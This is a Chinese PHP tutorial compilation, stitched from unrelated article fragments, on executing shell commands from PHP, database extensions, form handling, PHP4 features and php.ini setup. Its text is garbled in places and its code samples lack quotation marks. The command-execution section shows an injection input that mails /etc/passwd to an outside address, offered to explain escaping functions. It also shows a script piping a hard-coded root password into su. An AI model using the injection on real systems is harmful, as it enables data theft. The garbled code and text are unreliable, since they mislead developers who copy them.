PHP入门

PHP中对各类数据库的操作有着支持，对文件的操作也同样有着很丰富的操作方法，很多朋友现在的操作还是基于文件操作可是有的时候在操作文件的时候还存在不少的困惑和疑点，以下是我在日常编写过程中碰到的以及坛上朋友所碰到的关于文件操作的一些问题收藏吧。

看了FonTomas的用Editplus实现J2SDK的可视化编程(参见http://www.csdn.net/Develop/article/15/15416.shtm)一文后，笔者做为一个PHP程序员，萌发出了让Editplus调试PHP程序的想法。经过我的测试与N次的试验之后，终于可以让Editplus完美的实现这个功能了。具体实现方法如下:

PHP作为一种服务器端的脚本语言，象编写简单，或者是复杂的动态网页这样的任务，它完全能够胜任。但事情不总是如此，有时为了实现某个功能，必须借助于操作系统的外部程序（或者称之为命令），这样可以做到事半功倍。
那么，是否可以在PHP脚本中调用外部命令呢？如果能，如何去做呢？有些什么方面的顾虑呢？相信你看了本文后，肯定能够回答这些问题了。
是否可以？
答案是肯定的。PHP和其它的程序设计语言一样，完全可以在程序内调用外部命令，并且是很简单的：只要用一个或几个函数即可。
前提条件
由于PHP基本是用于WEB程序开发的，所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门：安全模式。如果运行在安全模式下，那么PHP脚本中将受到如下四个方面的限制：
执行外部命令
在打开文件时有些限制
连接MySQL数据库
基于HTTP的认证
在安全模式下，只有在特定目录中的外部程序才可以被执行，对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用safe_mode_exec_dir指令，或在编译PHP是加上--with-exec-dir选项来指定，默认是/usr/local/php/bin。
如果你调用一个应该可以输出结果的外部命令（意思是PHP脚本没有错误），得到的却是一片空白，那么很可能你的网管已经把PHP运行在安全模式下了。
如何做？
在PHP中调用外部命令，可以用如下三种方法来实现：
1） 用PHP提供的专门函数
PHP提供共了3个专门的执行外部命令的函数：system()，exec()，passthru()。
system()
原型：string system (string command [, int return_var])
system()函数很其它语言中的差不多，它执行给定的命令，输出和返回结果。第二个参数是可选的，用来得到命令执行后的状态码。
例子：
system(/usr/local/bin/webalizer/webalizer);
?>
exec()
原型：string exec (string command [, string array [, int return_var]])
exec()函数与system()类似，也执行给定的命令，但不输出结果，而是返回结果的最后一行。虽然它只返回命令结果的最后一行，但用第二个参数array可以得到完整的结果，方法是把结果逐行追加到array的结尾处。所以如果array不是空的，在调用之前最好用unset()最它清掉。只有指定了第二个参数时，才可以用第三个参数，用来取得命令执行的状态码。
例子：
exec(/bin/ls -l);
exec(/bin/ls -l, $res);
exec(/bin/ls -l, $res, $rc);
?>
passthru()
原型：void passthru (string command [, int return_var])
passthru()只调用命令，不返回任何结果，但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus（Unix下的一个处理图片的工具，输出二进制的原始图片的流）这样的程序。同样它也可以得到命令执行的状态码。
例子：
header(Content-type: image/gif);
passthru(./ppmtogif hunte.ppm);
?>
2） 用popen()函数打开进程
上面的方法只能简单地执行命令，却不能与命令交互。但有些时候必须向命令输入一些东西，如在增加Linux的系统用户时，要调用su来把当前用户换到root才行，而su命令必须要在命令行上输入root的密码。这种情况下，用上面提到的方法显然是不行的。
popen()函数打开一个进程管道来执行给定的命令，返回一个文件句柄?lt;热环祷氐氖且桓鑫募句柄，那么就可以对它读和写了。在PHP3中，对这种句柄只能做单一的操作模式，要么写，要么读；从PHP4开始，可以同时读和写了。除非这个句柄是以一种模式（读或写）打开的，否则必须调用pclose()函数来关闭它。
例子1：
$fp=popen(/bin/ls -l, r);
?>
例子2（本例来自PHP中国联盟网站http://www.phpx.com/show.php?d=col&i=51）：
/* PHP中如何增加一个系统用户
下面是一段例程，增加一个名字为james的用户,
root密码是 verygood。仅供参考
*/
$sucommand = su --login root --command;
$useradd = useradd ;
$rootpasswd = verygood;
$user = james;
$user_add = sprintf(%s %s %s,$sucommand,$useradd,$user);
$fp = @popen($user_add,w);
@fputs($fp,$rootpasswd);
@pclose($fp);
?>
3） 用反撇号（`，也就是键盘上ESC键下面的那个，和~在同一个上面）
这个方法以前没有归入PHP的文档，是作为一个秘技存在的。方法很简单，用两个反撇号把要执行的命令括起来作为一个表达式，这个表达式的值就是命令执行的结果。如：
$res=/bin/ls -l;
echo
.$res.
;
?>
这个脚本的输出就象：
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考虑些什么？
要考虑两个问题：安全性和超时。
先看安全性。比如，你有一家小型的网上商店，所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件，让你的用户输入他们的EMAIL地址，然后把这个产品列表发给他们?lt;偕枘忝挥惺褂肞HP的mail()函数（或者从未听说过），你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样：
system(mail $to < products.txt);
echo 我们的产品目录已经发送到你的信箱：$to;
?>
用这段代码，一般的用户不会产生什么危险，但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址：
--bla ; mail someone@domain.com < /etc/passwd ;
那么这条命令最终变成：
mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt
我相信，无论哪个网络管理人员见到这样的命令，都会吓出一身冷汗来。
幸好，PHP为我们提供了两个函数：EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的，象分号（），重定向（>）和从文件读入（<）等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号，并把字符串中的单引号转义，这样这个字符串就可以安全地作为命令的参数。
再来看看超时问题。如果要执行的命令要花费很长的时间，那么应该把这个命令放到系统的后台去运行。但在默认情况下，象system()等函数要等到这个命令运行完才返回（实际上是要等命令的输出结果），这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中，如：
system(/usr/local/bin/order_proc > /tmp/null &);
?>

提出问题

前几天做了一个非常奇怪的项目，我公司开发了一套基于中国联通SGIP协议的SP端短消息服务软件，提供联通130短信服务。这套系统是Windows 2000下的，数据库采用的是微软SQLServer2000，并且已经正常运行了一段时间。而最近由于要在WEB上提供短消息用户的一些信息，就需要从WEB上读写SQLServer数据库，本来SQLServer数据库的最佳搭档应该是微软IIS ASP服务端脚本，但我公司一向认为IIS+ASP的稳定性和安全性都不尽如意，希望能够在Linux下用PHP脚本读写SQLServer。

在新下载的PHP5中你会发现多了一个mysqli.dll，它是干什么用的呢？我简单介绍下：
mysqli.dll是PHP对mysql新特性的一个扩展支持。在PHP5中可以在php.ini中加载，如下图：

如果一个表单中有多个同名复选框，在提交到php时却只有一个值，而并不像asp那样是一串用逗号分割的值。有一个很简单的方法来解决：将复选框的name后面加上[]，例如：checkbox value=1 /> 改为：。这样php将得到一个叫ccc的阵列。但这种方法有个问题，如果您要在客户端对复选框是否被选择、选择了几个用javascript来判断时，javascript会因为复选框的name中含有[]而出错。您可以在表单中加入一个隐含域，用javascript设置它的值。

到满多网站都有即时简繁切换的功能,只是都不见有人提供做法,因 此我也写了一段转换程式,给有需要的人参考:
以下程式所用的table档是a4chinese的big5-gb.table,其版权为a4chinese作者所有;PHP程式码部分则可自由修改应用,唯不得出售营利..^^

OCIDefineByName
让 SELECT 指令可使用 PHP 变数。
语法: boolean OCIDefineByName(int stmt, string ColumnName, mixed &variable, int [type]);
传回值: 布林值
函式种类: 资料库功能

一名新 PHP 数据对象 (PDO) 数据抽象层的原始开发人员为您简要介绍该抽象层，重点讲述与 Oracle 一起运行的情况。

PHP4.0 提供了一个输出缓冲函数集合。输出缓冲支持允许你写包裹函数功能压缩缓冲区。在 PHP4 的输出缓冲支持允许 HTML 头信息存放, 无论 HTML的正文是否输出。但在PHP中，头信息( (header(), content type, and cookies )不采用缓冲 。
在使用PHP的过程中不免要使用到header和

PHP，一个嵌套的缩写名称，是英文“超级文本预处理语言”（PHP:Hypertext Preprocessor）的缩写。PHP 是一种 HTML 内嵌式的语言，PHP与微软的ASP颇有几分相似，都是一种在服务器端执行的“嵌入HTML文档的脚本语言”，语言的风格有类似于C语言，现在被很多的网站编程人员广泛的运用。PHP 独特的语法混合了 C、Java、Perl 以及 PHP 自创新的语法。它可以比 CGI 或者 Perl 更快速的执行动态网页。用PHP做出的动态页面与其他的编程语言相比，PHP是将程序嵌入到HTML文档中去执行，执行效率比完全生成HTML标记的CGI要高许多；与同样是嵌入HTML文档的脚本语言JavaScript相比，PHP在服务器端执行，成分利用了服务器的性能；PHP执行引擎还会将用户经常访问的PHP程序驻留在内存中，其他用户在一次访问这个程序时就不需要诚信编译程序了，只要直接执行内存中的代码就可以了，这也是PHP高效率的体现之一。PHP具有非常强大的功能，所有的CGI或者JavaScript的功能PHP都能实现，而且支持几乎所有流行的数据库以及操作系统。
PHP 最初是1994年Rasmus Lerdorf创建的，刚刚开始只是一个简单的用Perl语言编写的程序，用来统计他自己网站的访问者。后来又用C语言重新编写，包括可以访问数据库。在1995年以Personal Home Page Tools (PHP Tools) 开始对外发表第一个版本，Lerdorf写了一些介绍此程序的文档，并且发布了PHP1.0。在这早期的版本中，提供了访客留言本、访客计数器等简单的功能。以后越来越多的网站使用了PHP，别且强烈要且增加一些特性，比如循环语句和数组变量等等，在新的成员加入开发行列之后，在1995年中，PHP2.0发布了。第二版定名为PHP/FI(Form Interpreter)。PHP/FI加入了对mSQL的支持，从此建立了PHP在动态网页开发上的地位。到了1996年底，有15000个网站使用 PHP/FI；时间到了1997年中，使用PHP/FI的网站数字超过五万个。而在1997年中，开始了第三版的开发计划，开发小组加入了 Zeev Suraski 及 Andi Gutmans，而第三版就定名为PHP3。2000年，PHP4.0又问世了，其中增加了许多新的特性。
PHP的特性包括：
开放的源代码：所有的PHP源代码事实上都可以得到。
PHP是免费的。
基于服务器端：由于PHP是运行在服务器端的，即使再多的用户，再复杂的程序也不会影响运行的速度。
跨平台：PHP可以运行在UNIX、LINUX、WINDOWS下。
嵌入HTML：因为PHP可以嵌入HTML语言，所以学习起来并不困难。
简单的语言：PHP坚持脚本语言为主，与Java以C++不同。
效率高：PHP消耗相当少的系统资源。
图像处理：用PHP动态创建图像
PHP3跟Apache服务器紧密结合的特性；加上它不断的更新及加入新的功能；而且几乎支持所有主流与非主流数据库；再以它能高速的执行效率，使得PHP在1999年中的使用站点已经超过了150000万。加上它的源代码完全公开，在 Open Source意识抬头的今天，它更是这方面的中流砥柱。不断地有新的函数库加入，以及不停地更新的活力，使得PHP无论在UNIX、LINUX或是Windows的平台上都可以有更多新的功能。它提供丰富的函数，使得在程序设计方面有着更好的支持。
PHP4.0整个脚本程序的核心大幅更动，让程序的执行速度，满足更快的要求。在最佳化之后的效率，已较传统CGI或者ASP等程序有更好的表现。而且还有更强的新功能、更丰富的函数库。无论您接不接受，PHP 都将在 Web CGI 的领域上，掀起巅覆性的革命。对于一位专业的Web Master 而言，它将也是必修课程之一。
PHP 4.0是更有效的，更可靠的动态Web页开发工具，在大多数情况运行比 PHP 3.0要快，其脚本描述更强大并且更复杂, 最显著的特征是速率比的增加。PHP4.0这些优异的性能是PHP 脚本引擎重新设计产生的结果：引擎由 AndiGutmans 和 Zeev Suraski从底层全面重写。PHP4.0 脚本引擎 ——Zend 引擎，使用了一种更有效的“编译——执行”方式, 而不是PHP 3.0 采用的“执行 ——当解析时”模型。
PHP4在3.0版的基础上增加或增强了许多有用的特征，主要如下：
（1）别名：在PHP4中，可以利用引用为变量赋值，这给编程带来了很大的灵活性。
（2）扩充了API 模块：PHP 4.0 为扩展的 API 模块的提供了扩展PHP接口模块, 它比旧的 API 版本显著地快。 PHP 模块已有的及最常用的接口多数被转换到使用这个扩展的接口。
（3）自动资源释放：PHP4增加了引用计数功能，这种新技术的引入使PHP4具有了自动内存管理功能,减轻了开发人员的负担。
（4）布尔类型：PHP 4.0 支持布尔类型。
（5）进程生成：在 UNIX 环境下的 PHP 4.0 提供了一个很智能和通用的生成进程, 使用了一种名为基于automake/libtool的系统生成技术。
（6）COM/DCOM 支持：PHP 4.0 提供 COM/DCOM 支持 ( 仅用于Windows 环境 ) 可以无缝地存取和访问 COM 对象。
（7）与PHP 3.0 兼容性很好：PHP 4.0 是与 PHP 3.0 代码向后兼容性接近100% 。由于 PHP 4 的改进的体系结构,两者有一些细微的差别，但是大多数人将可能永远不可能遇上这种情况。
8）配置：PHP4重新设计和增强了PHP。ini文件,这使得用PHP。ini来配置PHP显得极为容易,这个文件可以在运行时被Apache(unix系统)或由Windows 注册(Windows 环境)。
（9）加密支持：PHP4实现了完整的加密, 这些加密功能是一个完整的mycrypt库，并且 PHP 4.0 支持哈希函数。Blowfish，TripleDES,MD5,并且SHA1 也是可使用的一些加密算法。
（10）类型检查：PHP 4.0 支持同一操作符用于评类型检查："==="（ 3 等号运算符 ）, 为在两个值和其类型之间作检查。例如,“ 3 ” ===3 将视为假 ( 类型是不同的 ), 而“ 3 ” ==3 ( 相等判断 ) 将视为真。
（11）FTP 支持：PHP 4.0 支持 FTP 。通常, 你会为通过一个调制解调器连接下载一个大文件提供一个接口。然而, 如果你确实有需要，可以使用PHP 。
（12）PHP4新增函数或功能增强函数：PHP 4.0 新增了许多函数,同时也将许多现有的函数功能进行了增强，以下是一些例子。 array_count_values() eval() foreach() nclude() ob_end_clean() ob_end_flush() ob_get_contents() ob_start() strip_tags() unset()
（13）“here”打印：PHP 4.0 的“Here”打印是与Perl类似的, 尽管完全不相同。“Here”是打印大容量文章的一个有用的方法,例如在 HTML文件中，不会漏掉任何一个字符，例如目录标记。
（14）HTTP Session fallback 系统：为 HTTP Session管理的一个 fallback 系统在 PHP 4.0被实现 。缺省情况下，Session标识符由cookies存储。如果没有cookies支持或一项cookies任务失败，Session标识符自动被创建并在 URL 的查询字符串中被携带。
（15）ISAPI 支持：PHP 4.0 能作为一个个性化的 ISAPI 模块作为 IIS插件 。这比 PHP 3.0 更有效, 它作为一个外部的程序来运行。
（16）内存：PHP 4.0 能更有效的使用内存, 导致较少的内存占用消耗,这主要归功于引用计数技术的实现。
（17）其他类成员函数：在 PHP 4.0 你能在成员函数本身的作用域或全局范围内调用其他类的成员函数。例如,你能用一个子函数覆盖父函数,并在子函数中调用父函数。
（18）多维数组：在 PHP 4.0 ，利用GET，POST,Cookies的进行的数据传输支持多维数组。
（19）个性化的 HTTP Session支持：HTTP Session处理, 包括 fallback 系统管理，在 PHP 4.0被它的新库函数实现 。在版本 3.0 中处理Session要求使用 PHPLIB 和第三方的库函数, 它比把Session直接地由 PHP 支持慢了许多。
（20）个性化的 Java 支持：PHP 4.0 支持和java的交互。这种个性化的Java 支持为PHP 在 Java 对象上创建和使用方法提供一个简单并且有效的工具。
21）对象和数嵌套组：PHP 4.0 实现了功能更加强大的对象, 移去了 PHP 3.0存在的种种句法限制。对象能在数组以内被嵌套并且反过来也如此, 可以根据你的需要实现嵌套。
（22）面向对象的编程：PHP 4.0 为面向对象的编程和构造类及对象提供扩展的功能和新特征。PHP4实现了对象重载,引用技术等新技术。
（23）对象重载支持：对象重载语法允许第三方的基于面向对象的类库使用 PHP4 的面向对象的特征存取他们自身的功能。使用这个特征的一个 COM 模块已经被实现了。
（24）输出缓冲支持：PHP 提供了一个输出缓冲函数集合。输出缓冲支持允许你写包裹函数功能压缩缓冲区。在 PHP4 的输出缓冲支持允许 HTML 头信息存放, 无论 HTML的正文是否输出。头信息( (header(), content type, and cookies ) 不采用缓冲 。
（25）增加了PCRE 库：PHP 4.0 包括一个 Perl 兼容的正则表达式 (PCRE ) 库, 和正常regex库一起与 PHP 绑定。split 和replace PCRE 功能被支持。PCRE 和 Perl 正规表达式之间有一些细微差别。
（26）PHP.ini 文件：PHP.ini文件在 PHP4.0 被重新设计, 使用的 PHP 的配置PHP.ini是更容易并且更有效的。全部文件能被Apache 在运行时间操作 ( 在 Apache环境 下 ) 或由 Windows 注册表 ( 在 Windows 下面 ) 。被加入PHP.ini文件的配置指令自动地在所有相关的模块中被支持。
（27）引用计数：PHP 4.0 为系统中的每个数值提供了引用计数, 包括资源。一旦一个资源不再被任何变量引用，它自动地被释放以节省内存资源。利用这个特征的最明显的例子一个内置SQL查询的循环语句。在PHP 3.0中 ，每次递归另外的 SQL 结果集合重复申请内存，直到脚本执行完毕,这些结果集合占用的内存才被释放。
（28）支持引用：通过引用可以改变一个变量的值。
（29）函数的运行时绑定：PHP 4.0 的运行时间绑定功能允许你在他们被声明以前调用, 无论声明是否在代码以后或是在运行时间。
（30）类的运行时信息：PHP 4.0 支持在运行时刻存取下列类信息：一个对象的类名，一个对象的父类的类名字，以及对象函数所在的名字。
（31）服务器抽象层：为支持Web服务器提供了增强型 SAPI ( 服务器 API ) 接口,是 PHP 4。0 不可分的一部分。这个服务器抽象层,提供了通用的WEB服务器接口支持,支持多线程WEB服务器,为大多数的WEB服务器提供透明的支持, 这些服务器包括 Apache ,IIS ( ISAPI ), 以及 AOL 服务器。
（32）语法的点亮显示：PHP 4.0 语法的点亮显示允许开发者看见源代码而不是脚本, 这个功能比PHP 3。0中的更有效。它跑得更快，更执行得更好，并且产生更紧凑的HTML代码。
（33）由引用改变变量的值：PHP 4.0 由引用支持可变的赋值, “关联”的2个变量之中个的任何一个的值被改变,另外的变量的值同样被改变,这类似与C中的指针类型。
（34）在引用字符串中的变量引用：PHP 4.0 增强了在引用字符串中的变量引用。例如, 这个例子在 PHP 3.0中 是不可能做到的 : print "${a[0]->bingo}"
PHP 在数据库方面的丰富支持，也是它迅速走红的原因之一，它支持下列的数据库或是数据文件：
· Adabas D
· DBA
· dBase
· dbm
· filePro
· Informix
· InterBase
· mSQL
· Microsoft SQL Server
· MySQL
· Solid
· Sybase
· ODBC
· Oracle 8
· Oracle
· PostgreSQL
而在 Internet 上它也支持了相当多的通讯协议 (protocol)，包括了与电子邮件相关的 IMAP, POP3；网管系统 SNMP；网络新闻 NNTP；帐号共用 NIS；全球信息网 HTTP 及 Apache 服务器；目录协议 LDAP 以及其它网络的相关函数。
除此之外，用 PHP 写出来的 Web 后端 CGI 程序，可以很轻易的移植到不同的操作系统上。例如，先以 Linux 架的网站，在系统负荷过高时，可以快速地将整个系统移到 SUN 工作站上，不用重新编译 CGI 程序。面对快速发展的 Internet，这是长期规划的最好选择。

1. Unix/Windows: 我的php.ini 文件应该放在哪？
UNIX下默认它应该放在 /usr/local/lib 目录下。 这是它的 /lib. 很多人会在编译时改变它，使用--with-config-file-path 标志。 例如, 你可以这样设它: --with-config-file-path=/etc
然后你可以复制源程序包里的 php.ini-dist 到 /etc/php.ini ，编辑它满足你的本地化需求。
Windows下 php.ini默认的路径是 Windows 系统目录. 如果你在使用 Apache webserver, php.ini 则最先在 Apaches 安装目录下被查找, 例如： c:program filesapache groupapache. 这样你可以有不同的 php.ini 对应不同版本的 Apache（同一台机器上）。
更多细节请查阅 configuration file.
2. Unix: 我安装了 PHP, 但我每次加载一个文档, 会得到下面的消息： Document Contains No Data! 怎么回事?
这可能是因为你的 PHP 发生了core-dumping错误。 查找你的服务器错误日志文件，看看是否属于这种情况。 然后报告这个错误。如果你知道怎样使用 gdb,你可以提供一个 backtrace 在你的错误报告里。这将会对开发人员解决 这个问题有很大帮助。如果你是在将PHP作为Apache模块使用，那么请按下面的步骤做：